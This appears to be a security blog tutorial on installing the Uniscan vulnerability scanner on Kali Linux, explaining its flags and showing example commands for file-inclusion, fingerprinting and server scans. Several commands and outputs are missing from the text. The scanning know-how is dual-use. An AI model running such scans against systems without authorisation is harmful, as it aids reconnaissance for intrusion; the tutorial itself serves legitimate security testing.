An RFI, or remote file inclusion attack, targets web applications that make use of includes via external scripts (commonly known as application plugins), hooks, themes, anything that is dynamically included in the web application during runtime.
If these includes contain vulnerabilities, it’s highly likely that exploiting the includes can lead to the main web application being exploitable.
That’s why today we’ll take a look at the Uniscan project. In the project’s own words, Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner.
critical risks for your entire IT infrastructure
We recommend using Kali Linux for Uniscan as it is available for easy installation via the package manager.
Installing Uniscan on Kali Linux is relatively straightforward, as it can be installed directly via the APT package manager and does not need compiling from source.
First, we update our APT package manager information with the following command:
Next, we proceed to install Uniscan:
apt install uniscan
To verify a successful Uniscan installation, let’s run the following command:
This should then return the following output, which displays the options/flags Uniscan has available:
Uniscan can run with minimal configuration as well, but it does allow for a good amount of customization:
- -h — The -h flag shows us all the options available under Uniscan.
- -u — The -u flag is used to specify the URL being scanned, for example: https://www.example.com/
- -f — If you wish to scan a list of URLs, you can input them into a text file and reference them with the -f flag as well.
- -b — Scans can take a while to complete if you have multiple URLs to scan. Using the -b flag pushes Uniscan to run in the background; alternatively, you can run Uniscan under a “screen” session as well under Linux.
- -q — The -q flag enables Directory-based checks for the target being scanned.
- -w — The “-w” flag enables Uniscan to check for files present on the remote host being scanned.
- -e — The “-e” flag enables Uniscan to check for robots.txt and sitemap.xml, which can further help identify the type of script/web application running on the target host.
- -d — The “-d” flag enables Dynamic checks within Uniscan to check for any dynamic file includes.
- -s — The “-s” flag enables Static checks within Uniscan to check for any static file includes.
- -r — The “-r” flag enables stress checks to be run on the target being scanned.
- -i and -o flags perform Bing and Google searches for dorks related to the target being scanned.
- -g — The “-g” flag is used for web fingerprinting, this helps identify what web application is running on the web server, what plugins are enabled (for example, in WordPress), what version of WordPress is running on the server, and more.
- -j — The “-j” flag is used to enable the server fingerprint check/listing, which allows for identification of the server software. This performs actions such as ping, Nmap, traceroute, and listing of the web server and operating system running.
Testing and results
To run a basic scan on a web app, we use the flags “qweds” which instruct Uniscan to perform the following:
- Directory checks (q)
- File checks (w)
- Robots/sitemap checks (e)
- Dynamic file include checks (d)
- Static file include checks (s)
The checks performed by the flags “qweds” can all be performed in the same run, with the command:
sudo uniscan -u https://target.webapp.url -qweds
Note: Replace https://target.webapp.url with the actual URL you wish to scan.
Which then returns to us the following output:
As seen above, when Directory and File checks are being performed, Uniscan will find and list directories as well as files seen on the target being scanned.
Next, Uniscan performs checks on the robot.txt, sitemap, and begins enumerating every external host linked off the target being scanned:
Uniscan also lists email addresses found on the web application being scanned, as shown in the following screenshot:
Then, Uniscan loads its plugins to perform the RFI (remote file inclusion) attack tests, XSS, SQL injection tests, and others:
Last but not least, the web application is checked for any web shells and the result is saved into a .html formatted report file:
Running a web fingerprinting scan
Running a web fingerprinting scan is another handy Uniscan feature. This option runs checks against the web application being scanned and tries to identify it along with running other scans such as capturing error information, WHOIS information, language, and interesting strings.
To run a web fingerprinting scan, we use the -g and -u flags:
sudo uniscan -g -u scanme.nmap.org
Which then returns the following results:
Running a server fingerprinting scan
Similar to the web fingerprinting scan, running a server fingerprinting scan is another key Uniscan feature, one that runs a series of tests such as ping, traceroute, Nmap, and Nslookup:
To run a server fingerprinting scan, we use the -j and -u flags:
sudo uniscan -j -u scanme.nmap.org
Which then returns the following ping and traceroute results:
Followed by the Nslookup results:
And, most importantly, the Nmap results of every port discovered and probed:
While this project is dead since many years ago, it’s still shipped in the Kali Linux repository and proves itself to be a good addition for any security analysis toolkit. The tool also provides other key features, such as stress checks and generation of the scan result into an HTML-formatted file.
Furthermore, Uniscan also performs key fingerprinting-related features such as web fingerprinting checks which allow one to find out which version of a web application is being run, and which plugins are enabled. Another interesting feature is the server fingerprinting feature that allows you to find out more about the server itself, performing scans such as Nmap scans, traceroutes, ping checks, identifying the web server and operating system running on the server as well.
Last but not least, with its simple, painless install procedure and availability via the APT package manager on KaliLinux itself, Uniscan integrates into one’s security toolset and is easily usable.